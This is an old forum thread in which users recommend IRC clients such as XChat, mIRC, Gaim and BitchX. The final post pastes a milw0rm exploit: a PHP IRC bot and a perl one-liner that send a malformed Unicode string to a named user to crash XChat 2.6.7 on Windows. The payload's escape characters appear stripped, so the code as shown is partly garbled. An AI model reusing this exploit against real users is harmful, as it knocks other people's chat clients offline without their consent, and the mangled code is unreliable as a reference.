Maulinwolf Posted August 6, 2006 Posted August 6, 2006 Any suggestions? thanks in advance as i am a irc noob. Quote
VaKo Posted August 6, 2006 Posted August 6, 2006 xchat seems to be popular, cross platform (although the windows versions need to be obtained in a roundabout fashion). Then just run it threw a SSH tunnel. Quote
Rabid_Marmot Posted August 6, 2006 Posted August 6, 2006 Gaim also works pretty well. It'll pretty much take care of all your chat clients. Quote
stingwray Posted August 6, 2006 Posted August 6, 2006 Xchat, if your using the windows version, google xchat and then second or third link down is to another website, where it is a available for free and unlimited time. Quote
VaKo Posted August 6, 2006 Posted August 6, 2006 google it, or watch season 1 of the show. but to be honest its unessacary unless you want to encrypt the evil servers fucking endless supply of crap qoutes. Quote
moonlit Posted August 7, 2006 Posted August 7, 2006 I use mIRC (though it's shareware it works after it expires just like it did before) and I don't like Trillian. Quote
wetelectric Posted August 7, 2006 Posted August 7, 2006 google it, or watch season 1 of the show. but to be honest its unessacary unless you want to encrypt the evil servers fucking endless supply of crap qoutes. Quote
metatron Posted August 7, 2006 Posted August 7, 2006 I use BitchX and that’s good enough for me. Quote
Bob Posted August 7, 2006 Posted August 7, 2006 i sue Xchat on linux and mirc on windows, but ive takena liking to Xchat... Quote
metatron Posted August 7, 2006 Posted August 7, 2006 Xchat Windows Version 2.6.7 Remote Dos Exploit, <? # another way to test this with irssi/bitchx <below> /str0ke # /exec -o perl -e 'print "x9xxF0x92x8Dx85xF1xA5x90xB4xF1x96x9Ex85xF1xA6x8DxA5xF1xB8xA5x85xF1xA7x95xA8x 29xF2x95x95x82"' ?> <?php // XChat <= 2.6.7 Windows Remote Crash DoS by ratboy // Tested on Windows SP1/SP2 // The following bug was tested on the XChat <= 2.6.7 on Windows SP1/SP2 //Stop the script timing out set_time_limit(0); //Set constants define("SERVER", 'irc.enigmagroup.org'); define("PORT", 6667); define("CHANNEL", "#enigmagroup"); //Set the channel the bot will join here define("NICK", "ratbot"); //Set the bot's nick here define("EXPLOIT", "x9xxF0x92x8Dx85xF1xA5x90xB4xF1x96x9Ex85xF1xA6x8DxA5xF1xB8xA5x85xF1xA7x95xA8x 29xF2x95x95x82"); define("VICTIM", "ratboy"); $socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket $fp = socket_connect($socket, SERVER, PORT); // Connect to the server socket_write($socket,"USER ratboy ratboy ratboy :ratboyrn"); // Send the Username to the server socket_write($socket,"NICK ".NICK." rn"); // Change our nickname socket_write($socket,"JOIN ".CHANNEL." rn"); // Join the channel while($data = @socket_read($socket,2046)) { //read the data echo $data; $cmd = explode(" ", $data); if (strpos($data, "PING :")===0) { socket_write($socket, "PONG :".substr($data, 6)."rn"); continue; } if($cmd[1] == "PRIVMSG"){ // Send the exploit right when the channel gets a message then stop the bot socket_write($socket, "PRIVMSG ".VICTIM." :".EXPLOIT."rn"); socket_close($socket); } } ?> # milw0rm.com [2006-08-07] Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.